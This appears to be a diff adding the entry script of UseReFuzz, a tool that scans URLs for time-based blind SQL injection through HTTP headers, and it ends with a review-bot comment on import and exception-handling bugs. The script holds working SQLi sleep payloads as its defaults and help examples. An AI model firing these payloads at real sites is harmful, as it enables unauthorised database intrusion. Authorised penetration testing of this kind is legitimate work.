| 1 | + | #!/usr/bin/env python3 |
| 2 | + | try: |
| 3 | + | from __init__ import header_injector , multi_payload |
| 4 | + | except: |
| 5 | + | from userefuzz import header_injector , multi_payload |
| 6 | + | |
| 7 | + | import colorama |
| 8 | + | import argparse |
| 9 | + | import os |
| 10 | + | import datetime |
| 11 | + | import configparser |
| 12 | + | import multiprocessing as mp |
| 13 | + | import sys |
| 14 | + | from functools import partial |
| 15 | + | |
| 16 | + | # For Colouring on Windows based OS |
| 17 | + | colorama.init() |
| 18 | + | |
| 19 | + | VERSION = '2.1.0' |
| 20 | + | class bcolors: |
| 21 | + | HEADER = '\033[95m' |
| 22 | + | OKBLUE = '\033[94m' |
| 23 | + | OKCYAN = '\033[96m' |
| 24 | + | OKGREEN = '\033[92m' |
| 25 | + | WARNING = '\033[93m' |
| 26 | + | FAIL = '\033[91m' |
| 27 | + | ENDC = '\033[0m' |
| 28 | + | BOLD = '\033[1m' |
| 29 | + | UNDERLINE = '\033[4m' |
| 30 | + | SLANT = '\x1B[3m' |
| 31 | + | |
| 32 | + | # Banner |
| 33 | + | banner=f""" |
| 34 | + | {bcolors.FAIL} ( ( |
| 35 | + | {bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ ) |
| 36 | + | ( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}( |
| 37 | + | )\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} ( |
| 38 | + | _ ((_))\ /{bcolors.FAIL}((_|_)) /{bcolors.WARNING}((_|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE} |
| 39 | + | | | | ((_|_)) | _ (_)) | |_(_))(((_|(_) |
| 40 | + | | |_| (_-< -_)| / -_)| __| || |_ /_ / |
| 41 | + | \___//__|___||_|_\___||_| \_,_/__/__| {bcolors.SLANT}{bcolors.UNDERLINE}V {VERSION}{bcolors.ENDC} {bcolors.SLANT}{bcolors.UNDERLINE}@github.com/root-tanishq{bcolors.ENDC} |
| 42 | + | |
| 43 | + | {bcolors.OKBLUE} |
| 44 | + | [ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC} |
| 45 | + | """ |
| 46 | + | |
| 47 | + | print(banner) |
| 48 | + | |
| 49 | + | # Arguments |
| 50 | + | parser = argparse.ArgumentParser() |
| 51 | + | parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST") |
| 52 | + | parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY") |
| 53 | + | parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header") |
| 54 | + | parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10) |
| 55 | + | parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False) |
| 56 | + | parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False) |
| 57 | + | parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT") |
| 58 | + | parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL') |
| 59 | + | parser.add_argument('-ch','--customheader', type=str,help=f'🔒_Custom Header for SQLI Injections (For Multiple Header seperate them with | )\t \t{bcolors.BOLD} {bcolors.OKBLUE} FOR ONE HEADER: -ch X-Auth FOR MULTIPLE HEADER: -ch "X-Auth|X-Test|Bearer|Custom_HEAD" {bcolors.ENDC}', default="NO_CUSTOM_HEADER") |
| 60 | + | parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5) |
| 61 | + | parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload Or a file of payloads for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'" -i sqli_payloads.txt{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"') |
| 62 | + | args = parser.parse_args() |
| 63 | + | |
| 64 | + | # Telify |
| 65 | + | CHAT_ID = '' |
| 66 | + | API_TOKEN = '' |
| 67 | + | is_telify_main = 'TELIFY_DOWN' |
| 68 | + | if args.telify: |
| 69 | + | try: |
| 70 | + | config = configparser.ConfigParser() |
| 71 | + | config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini')) |
| 72 | + | CHAT_ID = config['TELIFY']['CHATID'] |
| 73 | + | API_TOKEN = config['TELIFY']['APITOKEN'] |
| 74 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 75 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'}) |
| 76 | + | is_telify_main = 'TELIFY_UP' |
| 77 | + | except: |
| 78 | + | print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}") |
| 79 | + | |
| 80 | + | if args.customheader != 'NO_CUSTOM_HEADER': |
| 81 | + | print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE, args.customheader.replace('|',', '),bcolors.ENDC) |
| 82 | + | print() |
| 83 | + | else: |
| 84 | + | print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE,'User-Agent, X-Forwarded-For, Referer',bcolors.ENDC) |
| 85 | + | print() |
| 86 | + | |
| 87 | + | if args.output != "NO_OUTPUT": |
| 88 | + | print(f'{bcolors.BOLD} 📂 Logging Output of UseReFuzz to => {args.output}.md \n') |
| 89 | + | file = open(args.output + ".md","w") |
| 90 | + | # Custom Header |
| 91 | + | if args.customheader != 'NO_CUSTOM_HEADER': |
| 92 | + | output_ch = args.customheader.replace('|',', ') |
| 93 | + | else: |
| 94 | + | output_ch = 'User-Agent, X-Forwarded-For, Referer' |
| 95 | + | file.write(f""" |
| 96 | + | # UseReFuzz HEADER SQLI INJECTION REPORT |
| 97 | + | |
| 98 | + | ## Author - Tanishq Rathore (Kun) |
| 99 | + | ## Github - https://github.com/root-tanishq/userefuzz |
| 100 | + | ## Twitter - https://twitter.com/root_tanishq |
| 101 | + | |
| 102 | + | > UseReFuzz runned on `{datetime.datetime.now()}` |
| 103 | + | |
| 104 | + | ## Legality |
| 105 | + | |
| 106 | + | ``` |
| 107 | + | Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program |
| 108 | + | ``` |
| 109 | + | |
| 110 | + | - Headers `{output_ch}` |
| 111 | + | |
| 112 | + | - Sleep used for checking `{args.sleep}` |
| 113 | + | |
| 114 | + | # Report Results |
| 115 | + | | TIME TAKEN | URL | IS VULNERABLE | PAYLOAD | |
| 116 | + | | --- | --- | --- | --- | |
| 117 | + | """) |
| 118 | + | file.close() |
| 119 | + | |
| 120 | + | def main(): |
| 121 | + | if args.url != "NO_URL": |
| 122 | + | multi_payload(args.url,args.customheader,args.inject,args.message,args.proxy,args.output,API_TOKEN,CHAT_ID,is_telify_main,args.verbose,args.sleep) |
| 123 | + | elif args.list != "NO_LIST": |
| 124 | + | try: |
| 125 | + | urllist = filter(None , open(args.list,'r').read().split("\n")) |
| 126 | + | with mp.Pool(args.workers) as worker: |
| 127 | + | multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep) |
| 128 | + | worker.map(multi_fuzz , urllist) |
| 129 | + | except KeyboardInterrupt: |
| 130 | + | exit(0) |
| 131 | + | except: |
| 132 | + | if os.path.isfile(args.list): |
| 133 | + | exit(0) |
| 134 | + | else: |
| 135 | + | print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}') |
| 136 | + | elif not sys.stdin.isatty(): |
| 137 | + | try: |
| 138 | + | urlfile = [] |
| 139 | + | for line in sys.stdin: |
| 140 | + | try: |
| 141 | + | urlfile.append(line.split()[0]) |
| 142 | + | except: |
| 143 | + | pass |
| 144 | + | with mp.Pool(args.workers) as worker: |
| 145 | + | multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep) |
| 146 | + | worker.map(multi_fuzz , urlfile) |
| 147 | + | except KeyboardInterrupt: |
| 148 | + | exit(0) |
| 149 | + | except: |
| 150 | + | exit(0) |
| 151 | + | else: |
| 152 | + | print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# userefuzz --help {bcolors.ENDC}") |
| 153 | + | |
| 154 | + | if __name__ == '__main__': |
| 155 | + | main() |
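Review bot: `requests` is never imported in this file (only `header_injector` and `multi_payload` come in from the package), so the `requests.post(...)` call in the Telify block raises `NameError`, which the bare `except:` directly below swallows and reports as "No Configuration found"; `is_telify_main` therefore stays `'TELIFY_DOWN'` even with a valid `telify.ini`. Add `import requests` next to the other imports and narrow the handler to `except (KeyError, requests.RequestException) as exc:`, so a missing `[TELIFY]` section or a network failure is reported as such and programming errors are no longer hidden. The bare `except:` handlers in `main()` have the same problem: they call `exit(0)`, so a failure in the worker pool ends the run with a success status and no message. The `requests.post` call also passes no `timeout=`, so a stalled connection to the Telegram API can block startup indefinitely.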